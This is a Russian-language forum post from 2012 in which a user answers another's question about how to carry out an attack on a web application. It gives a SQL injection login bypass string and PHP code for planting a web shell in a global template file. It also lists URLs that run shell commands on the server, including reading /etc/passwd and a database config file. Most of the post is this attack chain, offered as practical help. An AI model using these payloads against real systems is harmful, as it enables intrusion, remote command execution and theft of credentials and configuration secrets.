Показать сообщение отдельно

  #196  
Старый 19.08.2012, 01:00
drmorgan
Постоянный
Регистрация: 02.02.2010
Сообщений: 466
С нами: 8564726

Репутация: 52
По умолчанию

Цитата:

Сообщение от kir2914

Ок. Как это реализовать?

Это инъекция , посмотри на форуме тут полно статей, тут в двух словах не отпишешся надо целую статью писать.

Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе.

Пример:

user: ' or isnull(1/0) /*
pass: whatever

Получив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'.

Пример:

//***********************************************

TEMPLATE;
}
}
system($HTTP _GET_VARS[command]);

И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера.

Примеры:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/etc/passwd

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/[path_to_config_file]/data.inc.php
 
Ответить с цитированием